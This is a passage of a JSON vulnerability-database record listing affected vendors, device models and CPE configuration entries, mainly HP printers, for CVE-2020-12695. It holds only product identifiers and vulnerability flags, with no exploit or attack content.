"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4656 k9v81b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 f2e72a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4503 e6g71b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4518",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn517a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u91a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5543 n9u88a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 7644 e4w46a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 y0k15a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "adsl",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"model": "envy 6052 5se18a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 z3m37a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 3548 a9t81b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 z4a74a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4522 f0v67a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4535 f0v64b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn519a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 f0v63b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7155 z3m52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 k7g18a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 114 cq811b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5664 f8b08a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "hg532e",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": null
},
{
"model": "envy 4523 j6u60b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "amg1202-t10b",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": null
},
{
"model": "envy 5020 m2u91b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 k7s00a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5542 k7c88a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4657 v6d29b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "hg255s",
"scope": "eq",
"trust": 1.0,
"vendor": "huawei",
"version": null
},
{
"model": "envy 4500 a9t80b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4521 k9t10b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4515",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4675 f1h97b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7164 k7g99a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 g0v52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4512 k9h49a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-320",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 6020 5se17a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-2101",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 100 cn517b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-241",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 3456 a9t84c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4500 d3p93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "5030 z4a70a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn517c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 g0v53a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wap351",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "envy 5534",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "5660 f8b04a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-620",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 3545 a9t81c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 f0v69a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4501 c8d05a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5535",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6222 y0k14d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4511 k9h50a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "ep-101",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 4675 f1h97a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5642 b9s64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "zxv10 w300",
"scope": "eq",
"trust": 1.0,
"vendor": "zte",
"version": null
},
{
"model": "envy 5540 g0v47a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4500 a9t89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4509 d3p94b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5539",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 y0g52b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 3545 a9t83b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4650 e6g87a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7120 z3m41d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4676 f1h98a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4524 f0v72b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 120 cz022a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wr8165n",
"scope": "eq",
"trust": 1.0,
"vendor": "nec",
"version": null
},
{
"model": "envy 110 cq812c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 5575 g0v48b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4655 k9v79a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4654 f1j06b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 120 cz022b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wap150",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "envy 5640 b9s56a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4504 a9t88b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-330",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy pro 6420 6wd16a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 f0v63a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4526 k9t05b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4650 f1h96a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4502 a9t87b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4650 f1h96b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6455 5se45a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7822 y0g43d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-4105",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "selphy cp1200",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": null
},
{
"model": "xp-100",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5643 b9s63a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4535 f0v64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4655 f1j00a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"model": "archer c50",
"scope": "eq",
"trust": 1.0,
"vendor": "tp link",
"version": null
},
{
"model": "envy photo 6220 k7g20d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-8600",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "wnhde111",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "officejet 4654 f1j07b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-2105",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5531",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 k7s21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4524 k9t01a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"model": "envy 5544 k7c93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "hostapd",
"scope": "lt",
"trust": 1.0,
"vendor": "w1 fi",
"version": "2.0.0"
},
{
"model": "officejet 4655 k9v82b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-340",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "envy 4524 f0v71b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 3xd89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4528 k9t08b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5530",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-440",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy photo 6200 y0k13d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6230 k7g25b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 114 cq812a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4536 f0v65a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4502 a9t85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5548 k7g87a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "ew-m970a3t",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5000 m2u94b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6020 6wd35a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4658 v6d30b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn519b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "rt-n11",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": null
},
{
"model": "deskjet ink advantage 3546 a9t82a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4513 k9h51a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6020 7cz37a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6220 k7g21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u91a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": "*"
},
{
"model": "vmg8324-b10a",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": null
},
{
"model": "unifi controller",
"scope": "eq",
"trust": 1.0,
"vendor": "ui",
"version": null
},
{
"model": "xp-4100",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "deskjet ink advantage 5575 g0v48c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5546 k7c90a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5644 b9s65a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "20.04"
},
{
"model": "envy 6020 5se16b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 k7s10d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5547 j6u64a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 y0g42d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 e6g67a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 g0v51a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "zonedirector 1200",
"scope": "eq",
"trust": 1.0,
"vendor": "ruckussecurity",
"version": null
},
{
"model": "envy 5000 z4a54a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "b1165nfw",
"scope": "eq",
"trust": 1.0,
"vendor": "dell",
"version": null
},
{
"model": "deskjet ink advantage 4678 f1h99b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u85b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6420 6wd14a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xbox one",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19041.2494"
},
{
"model": "envy 5532",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4504 c8d04a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5544 k7c89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-970",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy photo 7830 y0g50b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5640 b9s58a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "wap131",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "xp-8500",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "5030 m2u92b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4535 f0v64c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4509 d3p94a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5536",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5665 f8b06a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5000 m2u85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 100 cn518a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5540 k7c85a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-630",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 5545 g0v50a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 k7g99a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 114 cq811a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "m571t",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy pro 6420 5se46a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7822 y0g42d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6252 k7g22a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4527 j6u61b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "rt-n11",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "adsl",
"scope": null,
"trust": 0.8,
"vendor": "broadcom",
"version": null
},
{
"model": "dvg-n5412sp",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "unifi controller",
"scope": null,
"trust": 0.8,
"vendor": "ubiquiti",
"version": null
},
{
"model": "hostapd",
"scope": null,
"trust": 0.8,
"vendor": "w1 fi",
"version": null
},
{
"model": "selphy cp1200",
"scope": null,
"trust": 0.8,
"vendor": "canon",
"version": null
},
{
"model": "wap131",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wap150",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wap351",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "b1165nfw",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ui:unifi_controller:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:w1.fi:hostapd:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:asus:rt-n11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:broadcom:adsl:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:canon:selphy_cp1200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:wap150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:cisco:wap351:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:cisco:wap131:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dvg-n5412sp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dell:b1165nfw:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:epson:ew-m970a3t:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:ep-101:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-8500:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-702:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-340:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-320:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-960:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-2101:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-330:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-2105:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-8600:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-4105:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-241:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-970:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:xp-440:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:epson:m571t:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u85a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u85b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u91a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u94b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_z4a54a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_z4a74a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_k7g18a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_k7g26b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_k7s21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_y0k13d_:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6200_y0k15a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_3xd89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_k7g93a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_k7g99a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_z3m37a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7100_z3m52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_k7r96a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_k7s00a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_k7s10d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_y0g42d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7800_y0g52b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5020_m2u91b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_114_cq811a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_114_cq811b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_114_cq812a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_111_cq810a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
